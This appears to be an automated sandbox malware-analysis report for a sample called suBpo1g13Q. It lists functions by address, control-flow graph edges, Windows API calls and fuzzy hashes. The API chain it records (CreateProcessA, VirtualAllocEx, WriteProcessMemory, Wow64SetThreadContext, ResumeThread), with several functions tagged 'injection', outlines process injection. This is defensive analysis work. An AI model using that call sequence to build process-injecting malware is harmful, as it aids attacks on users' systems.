                                                                                                                control_flow_graph 45 71ddd4c-71ddded 48 71dddef-71dddf9 45->48 49 71dde26-71dde46 45->49 48->49 50 71dddfb-71dddfd 48->50 56 71dde7f-71ddeae 49->56 57 71dde48-71dde52 49->57 51 71dddff-71dde09 50->51 52 71dde20-71dde23 50->52 54 71dde0d-71dde1c 51->54 55 71dde0b 51->55 52->49 54->54 58 71dde1e 54->58 55->54 63 71ddee7-71ddfa1 CreateProcessA 56->63 64 71ddeb0-71ddeba 56->64 57->56 59 71dde54-71dde56 57->59 58->52 61 71dde79-71dde7c 59->61 62 71dde58-71dde62 59->62 61->56 65 71dde64 62->65 66 71dde66-71dde75 62->66 77 71ddfaa-71de030 63->77 78 71ddfa3-71ddfa9 63->78 64->63 68 71ddebc-71ddebe 64->68 65->66 66->66 67 71dde77 66->67 67->61 69 71ddee1-71ddee4 68->69 70 71ddec0-71ddeca 68->70 69->63 72 71ddecc 70->72 73 71ddece-71ddedd 70->73 72->73 73->73 75 71ddedf 73->75 75->69 88 71de040-71de044 77->88 89 71de032-71de036 77->89 78->77 91 71de054-71de058 88->91 92 71de046-71de04a 88->92 89->88 90 71de038 89->90 90->88 94 71de068-71de06c 91->94 95 71de05a-71de05e 91->95 92->91 93 71de04c 92->93 93->91 96 71de07e-71de085 94->96 97 71de06e-71de074 94->97 95->94 98 71de060 95->98 99 71de09c 96->99 100 71de087-71de096 96->100 97->96 98->94 102 71de09d 99->102 100->99 102->102
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071DDF8E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 28c0f5c1b2181b9b0f4f2adf3c1ac932faca6a95f444c8ad5ac9a817eda1ef85
                                                                                                                • Instruction ID: 1cc4e127c5226c512f498803b4abe6e8256aa0d300b77ea6715cdcf9ee9d7f31
                                                                                                                • Opcode Fuzzy Hash: 28c0f5c1b2181b9b0f4f2adf3c1ac932faca6a95f444c8ad5ac9a817eda1ef85
                                                                                                                • Instruction Fuzzy Hash: 5FA15CB1E00219DFEF25DFA8D8407EDBBB2BF48310F14856AE849A7280D7759985CF91
                                                                                                                Function 071DDD58 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 103 71ddd58-71ddded 105 71dddef-71dddf9 103->105 106 71dde26-71dde46 103->106 105->106 107 71dddfb-71dddfd 105->107 113 71dde7f-71ddeae 106->113 114 71dde48-71dde52 106->114 108 71dddff-71dde09 107->108 109 71dde20-71dde23 107->109 111 71dde0d-71dde1c 108->111 112 71dde0b 108->112 109->106 111->111 115 71dde1e 111->115 112->111 120 71ddee7-71ddfa1 CreateProcessA 113->120 121 71ddeb0-71ddeba 113->121 114->113 116 71dde54-71dde56 114->116 115->109 118 71dde79-71dde7c 116->118 119 71dde58-71dde62 116->119 118->113 122 71dde64 119->122 123 71dde66-71dde75 119->123 134 71ddfaa-71de030 120->134 135 71ddfa3-71ddfa9 120->135 121->120 125 71ddebc-71ddebe 121->125 122->123 123->123 124 71dde77 123->124 124->118 126 71ddee1-71ddee4 125->126 127 71ddec0-71ddeca 125->127 126->120 129 71ddecc 127->129 130 71ddece-71ddedd 127->130 129->130 130->130 132 71ddedf 130->132 132->126 145 71de040-71de044 134->145 146 71de032-71de036 134->146 135->134 148 71de054-71de058 145->148 149 71de046-71de04a 145->149 146->145 147 71de038 146->147 147->145 151 71de068-71de06c 148->151 152 71de05a-71de05e 148->152 149->148 150 71de04c 149->150 150->148 153 71de07e-71de085 151->153 154 71de06e-71de074 151->154 152->151 155 71de060 152->155 156 71de09c 153->156 157 71de087-71de096 153->157 154->153 155->151 159 71de09d 156->159 157->156 159->159
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071DDF8E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 253ab80d77ff8601fbe282db17996d58a32efe6b3472ce4e631dff07429254ca
                                                                                                                • Instruction ID: 24af2472cb901979575f95758e87b7fb688ed6c1dc9f0ad140d698b8c20ead5b
                                                                                                                • Opcode Fuzzy Hash: 253ab80d77ff8601fbe282db17996d58a32efe6b3472ce4e631dff07429254ca
                                                                                                                • Instruction Fuzzy Hash: 0B913BB1E00219DFEF25CFA8D8407EDBBB2BF48310F14856AE849A7280D7759985CF91
                                                                                                                Function 0296AF19 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 160 296af19-296af37 161 296af63-296af67 160->161 162 296af39-296af46 call 29698a0 160->162 164 296af7b-296afbc 161->164 165 296af69-296af73 161->165 169 296af5c 162->169 170 296af48 162->170 171 296afbe-296afc6 164->171 172 296afc9-296afd7 164->172 165->164 169->161 215 296af4e call 296b1b0 170->215 216 296af4e call 296b1c0 170->216 171->172 173 296affb-296affd 172->173 174 296afd9-296afde 172->174 179 296b000-296b007 173->179 176 296afe0-296afe7 call 296a270 174->176 177 296afe9 174->177 175 296af54-296af56 175->169 178 296b098-296b158 175->178 181 296afeb-296aff9 176->181 177->181 210 296b160-296b18b GetModuleHandleW 178->210 211 296b15a-296b15d 178->211 182 296b014-296b01b 179->182 183 296b009-296b011 179->183 181->179 184 296b01d-296b025 182->184 185 296b028-296b031 call 296a280 182->185 183->182 184->185 191 296b033-296b03b 185->191 192 296b03e-296b043 185->192 191->192 193 296b045-296b04c 192->193 194 296b061-296b06e 192->194 193->194 196 296b04e-296b05e call 296a290 call 296a2a0 193->196 200 296b070-296b08e 194->200 201 296b091-296b097 194->201 196->194 200->201 212 296b194-296b1a8 210->212 213 296b18d-296b193 210->213 211->210 213->212 215->175 216->175
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0296B17E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356396868.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2960000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: b3562182b8605a0ec10bd70c9f585eb15033d0531742aeee1b1694f79c8b2ac8
                                                                                                                • Instruction ID: ab5ac770e3db44e7d6e0adbcfada30f2b9f6bf7cb98618b9c990ebd1f0c2e2ac
                                                                                                                • Opcode Fuzzy Hash: b3562182b8605a0ec10bd70c9f585eb15033d0531742aeee1b1694f79c8b2ac8
                                                                                                                • Instruction Fuzzy Hash: A6815670A00B458FD724DF29D45876ABBF5BF88308F00892ED09AE7A50E775E849CF91
                                                                                                                Function 0296449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 217 296449c-29659d9 CreateActCtxA 220 29659e2-2965a3c 217->220 221 29659db-29659e1 217->221 228 2965a3e-2965a41 220->228 229 2965a4b-2965a4f 220->229 221->220 228->229 230 2965a60-2965a90 229->230 231 2965a51-2965a5d 229->231 235 2965a42-2965a4a 230->235 236 2965a92-2965b14 230->236 231->230 235->229 239 29659cf-29659d9 235->239 239->220 239->221
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 029659C9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356396868.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2960000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: d9ba641716c5bade0f15e43cccfa70b30eddb4b43be832a3d027cb277c602919
                                                                                                                • Instruction ID: f6c27f0ece89dde0fe6351bb6fa2a256e82bb5871fbeec049a43cc2a5bf41b1c
                                                                                                                • Opcode Fuzzy Hash: d9ba641716c5bade0f15e43cccfa70b30eddb4b43be832a3d027cb277c602919
                                                                                                                • Instruction Fuzzy Hash: FA41B270C00719DBEB24CFA9C885BDDBBF5BF48304F60816AD409AB251DB756946CF90
                                                                                                                Function 0296590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 240 296590c-29659d9 CreateActCtxA 242 29659e2-2965a3c 240->242 243 29659db-29659e1 240->243 250 2965a3e-2965a41 242->250 251 2965a4b-2965a4f 242->251 243->242 250->251 252 2965a60-2965a90 251->252 253 2965a51-2965a5d 251->253 257 2965a42-2965a4a 252->257 258 2965a92-2965b14 252->258 253->252 257->251 261 29659cf-29659d9 257->261 261->242 261->243
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 029659C9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356396868.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2960000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: 6c4c832f84da226a290ce7cbef079e04ba31235276a36c9ceedd0f9b0c6f283d
                                                                                                                • Instruction ID: ae7df0edc0b1090b355c127607be5f6f7fa95f76f731dc52dda7a37fd81c8a12
                                                                                                                • Opcode Fuzzy Hash: 6c4c832f84da226a290ce7cbef079e04ba31235276a36c9ceedd0f9b0c6f283d
                                                                                                                • Instruction Fuzzy Hash: 3A41CEB1C007198BEB24CFA9C884BDDBBF5BF48304F60816AD408AB255DB76694ACF50
                                                                                                                Function 071DDAC8 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 262 71ddac8-71ddb1e 265 71ddb2e-71ddb6d WriteProcessMemory 262->265 266 71ddb20-71ddb2c 262->266 268 71ddb6f-71ddb75 265->268 269 71ddb76-71ddba6 265->269 266->265 268->269
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071DDB60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                • Opcode ID: 5a6131f3292fb2b75fe839d05a217f7067ec53e63c02a4f7c60f9dbe5316720e
                                                                                                                • Instruction ID: 7626073d5551e9770d33fc3222fda5394cf772286798003b3974d094c6ea30fc
                                                                                                                • Opcode Fuzzy Hash: 5a6131f3292fb2b75fe839d05a217f7067ec53e63c02a4f7c60f9dbe5316720e
                                                                                                                • Instruction Fuzzy Hash: E9214BB59003099FDB10DFA9D841BDEBBF5FF48320F14842AE958A7240C7799945CFA4
                                                                                                                Function 071B5D50 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 273 71b5d50-71b5da4 275 71b5daf-71b5dbe 273->275 276 71b5da6-71b5dac 273->276 277 71b5dc3-71b5dfc DrawTextExW 275->277 278 71b5dc0 275->278 276->275 279 71b5dfe-71b5e04 277->279 280 71b5e05-71b5e22 277->280 278->277 279->280
                                                                                                                APIs
                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,071B5D3D,?,?), ref: 071B5DEF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1361991928.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71b0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DrawText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2175133113-0
                                                                                                                • Opcode ID: 808ffd5b270bcc1ed931061e61eccae541fb3e6c5f36ea01d9f73acb2bb16c1d
                                                                                                                • Instruction ID: 1c2f4a8d812b3449add8bd0a7a76bb4d0e1ecf566d0831b9777583bec9836463
                                                                                                                • Opcode Fuzzy Hash: 808ffd5b270bcc1ed931061e61eccae541fb3e6c5f36ea01d9f73acb2bb16c1d
                                                                                                                • Instruction Fuzzy Hash: 553102B5D0030A9FDB10CF9AD884ADEFBF5FB48320F14842AE818A7250D374A950CFA0
                                                                                                                Function 071DD931 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 283 71dd931-71dd983 287 71dd985-71dd991 283->287 288 71dd993-71dd9c3 Wow64SetThreadContext 283->288 287->288 290 71dd9cc-71dd9fc 288->290 291 71dd9c5-71dd9cb 288->291 291->290
                                                                                                                APIs
                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071DD9B6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContextThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 983334009-0
                                                                                                                • Opcode ID: eb7e5830c462f13974fe6721e3893ba271a8573464e8c2d91cb4403035df89c6
                                                                                                                • Instruction ID: 634f4e1c472b176ad7a39dd134c871917a729fc04962f92790455529722fb3f9
                                                                                                                • Opcode Fuzzy Hash: eb7e5830c462f13974fe6721e3893ba271a8573464e8c2d91cb4403035df89c6
                                                                                                                • Instruction Fuzzy Hash: D5218CB5D003099FDB24DFAAD4417EEBFF5EF48220F14842AD458A7281D7799985CFA0
                                                                                                                Function 071B47BC Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 295 71b47bc-71b5da4 297 71b5daf-71b5dbe 295->297 298 71b5da6-71b5dac 295->298 299 71b5dc3-71b5dfc DrawTextExW 297->299 300 71b5dc0 297->300 298->297 301 71b5dfe-71b5e04 299->301 302 71b5e05-71b5e22 299->302 300->299 301->302
                                                                                                                APIs
                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,071B5D3D,?,?), ref: 071B5DEF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1361991928.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71b0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DrawText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2175133113-0
                                                                                                                • Opcode ID: 603ff1e898dccea9078c0f5fbf4e82e5d1ca9310c550751565205e4096d4d4a6
                                                                                                                • Instruction ID: df6a47b3b12c5135dff165ca74933684a86abb58983fed37c71f50fb3936852b
                                                                                                                • Opcode Fuzzy Hash: 603ff1e898dccea9078c0f5fbf4e82e5d1ca9310c550751565205e4096d4d4a6
                                                                                                                • Instruction Fuzzy Hash: 8131E2B59003499FDB10CF9AD884ADEFBF5FB48320F54842AE919A7250D375A954CFA0
                                                                                                                Function 071DDAD0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 305 71ddad0-71ddb1e 307 71ddb2e-71ddb6d WriteProcessMemory 305->307 308 71ddb20-71ddb2c 305->308 310 71ddb6f-71ddb75 307->310 311 71ddb76-71ddba6 307->311 308->307 310->311
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071DDB60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                • Opcode ID: 469bec383805bba3fe9a5fb36579f1bf4b051a284a13ef467bef3af07d8800b6
                                                                                                                • Instruction ID: 5ff506ca31c6a1cf837579233d3ba5792bf9c3d5fb1bfe0145075ec671b525ab
                                                                                                                • Opcode Fuzzy Hash: 469bec383805bba3fe9a5fb36579f1bf4b051a284a13ef467bef3af07d8800b6
                                                                                                                • Instruction Fuzzy Hash: CD2126B59003499FDB10CFAAC881BDEBBF5FF48310F10842AE958A7240C7799941CBA4
                                                                                                                Function 071DDBB8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 315 71ddbb8-71ddc4d ReadProcessMemory 319 71ddc4f-71ddc55 315->319 320 71ddc56-71ddc86 315->320 319->320
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071DDC40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                • Opcode ID: ecc0623da1bb6ad6297d812cc560168e914565870f550ec61590c012ec9d733b
                                                                                                                • Instruction ID: ff451fea18d4b34f940a3b543895660e04cbd546262c961bed4e0f06d438faee
                                                                                                                • Opcode Fuzzy Hash: ecc0623da1bb6ad6297d812cc560168e914565870f550ec61590c012ec9d733b
                                                                                                                • Instruction Fuzzy Hash: A42127B1D003499FDB20DFAAD841BDEBBF4FF48320F10842AE558A7240C779A941CBA4
                                                                                                                Function 0296D808 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 324 296d808-296d80a 325 296d810-296d8a4 DuplicateHandle 324->325 326 296d8a6-296d8ac 325->326 327 296d8ad-296d8ca 325->327 326->327
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0296D897
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356396868.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2960000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 66f0e2de1d7eab0e13e39bc3e07083cd479ce346ddf03faeef43dd0a57db1482
                                                                                                                • Instruction ID: 1e2f35d3c9d2a75b6c3812eb7f1b66533a6f669d09cfc7681f2b447c6da4e61d
                                                                                                                • Opcode Fuzzy Hash: 66f0e2de1d7eab0e13e39bc3e07083cd479ce346ddf03faeef43dd0a57db1482
                                                                                                                • Instruction Fuzzy Hash: 5821D4B59003489FDB10CF9AD584AEEBBF8EB48310F14841AE954A3210D375A955CF65
                                                                                                                Function 071DDBC0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071DDC40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                • Opcode ID: b72fb43d3492950835254046ba9debe48b62f64c4f5f6b02442075dd28ba8d19
                                                                                                                • Instruction ID: 43de9a5fb02a148871685881f8c6407096cf08c8994efed676af8e0a15c63670
                                                                                                                • Opcode Fuzzy Hash: b72fb43d3492950835254046ba9debe48b62f64c4f5f6b02442075dd28ba8d19
                                                                                                                • Instruction Fuzzy Hash: B72105B1D003499FDB10CFAAC841BDEBBF5FF48320F10842AE958A7240C779A941CBA4
                                                                                                                Function 071DD938 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 330 71dd938-71dd983 332 71dd985-71dd991 330->332 333 71dd993-71dd9c3 Wow64SetThreadContext 330->333 332->333 335 71dd9cc-71dd9fc 333->335 336 71dd9c5-71dd9cb 333->336 336->335
                                                                                                                APIs
                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071DD9B6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContextThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 983334009-0
                                                                                                                • Opcode ID: f098989d59f7d245cd85379b3bb1cd9bf226973f483d7a0702dcfeebb8d265e0
                                                                                                                • Instruction ID: 849ce11ac4d5e60565f6e5d0e5feadd0ac9addaa623c660cc37cec832a798220
                                                                                                                • Opcode Fuzzy Hash: f098989d59f7d245cd85379b3bb1cd9bf226973f483d7a0702dcfeebb8d265e0
                                                                                                                • Instruction Fuzzy Hash: CC2135B1D003098FDB24DFAAC4857EEBBF5EF48320F54842AD459A7280C779A945CFA0
                                                                                                                Function 0296D810 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0296D897
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356396868.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2960000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 0037b7804a4175b7a31db09facda165377536c7f047975a58dcbe1a61f3c0801
                                                                                                                • Instruction ID: cbf327a6c24c07a73fca17eff61c51c3bcf856ec212b197e8bbf25e78c98425f
                                                                                                                • Opcode Fuzzy Hash: 0037b7804a4175b7a31db09facda165377536c7f047975a58dcbe1a61f3c0801
                                                                                                                • Instruction Fuzzy Hash: A821C4B5D003489FDB10CF9AD584ADEFBF8EB48320F14841AE918A7350D375A955CFA5
                                                                                                                Function 071DDA08 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071DDA7E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: 1a2c3c0e70491dd9951bbcc5dceabb2f591c5750d3ce935d1ac4ad197934509d
                                                                                                                • Instruction ID: 15ece9bd7b884b4c68a05f491014e4430c25387df461a195b2172b83b25415b3
                                                                                                                • Opcode Fuzzy Hash: 1a2c3c0e70491dd9951bbcc5dceabb2f591c5750d3ce935d1ac4ad197934509d
                                                                                                                • Instruction Fuzzy Hash: F1116A769003099FDB20CFAAD845BDEBBF5EF48320F10841AE819A7250C7799941CFA0
                                                                                                                Function 071DD449 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: 0d15e86f47ab5de398bfbde4187fea68b9b016a19e947c3c299d1fa5e6f2056c
                                                                                                                • Instruction ID: 2f8cd9e9d52e801e9e204ce8884371ee9e877f0cc3b71e15a34cf901d60577da
                                                                                                                • Opcode Fuzzy Hash: 0d15e86f47ab5de398bfbde4187fea68b9b016a19e947c3c299d1fa5e6f2056c
                                                                                                                • Instruction Fuzzy Hash: 531158B1D003488FDB20DFAAD4457EEFBF4EB48220F24841AD459A7640CB79A941CFA0
                                                                                                                Function 071DDA10 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071DDA7E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: 1456745849b425e6ec533e0faa89b7651612cbc17e9b129599790740f1d0c3ec
                                                                                                                • Instruction ID: 2b8b884b4597a96659a7d82f7836bf730e2e961a055cabca984c00dc82ce8d78
                                                                                                                • Opcode Fuzzy Hash: 1456745849b425e6ec533e0faa89b7651612cbc17e9b129599790740f1d0c3ec
                                                                                                                • Instruction Fuzzy Hash: 751137B59003499FDB20DFAAC845BDEBBF5EF48320F14841AE919A7250C779A941CFA4
                                                                                                                Function 071DD450 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: 125dc6468a97226bd956063e532846807b3ac91be41d13f9bef36c5a8d85d065
                                                                                                                • Instruction ID: eb2bbbdc290dee2d4b07b6a1a6043aa3bb1acdf015c29db6b6c34f83003e6f55
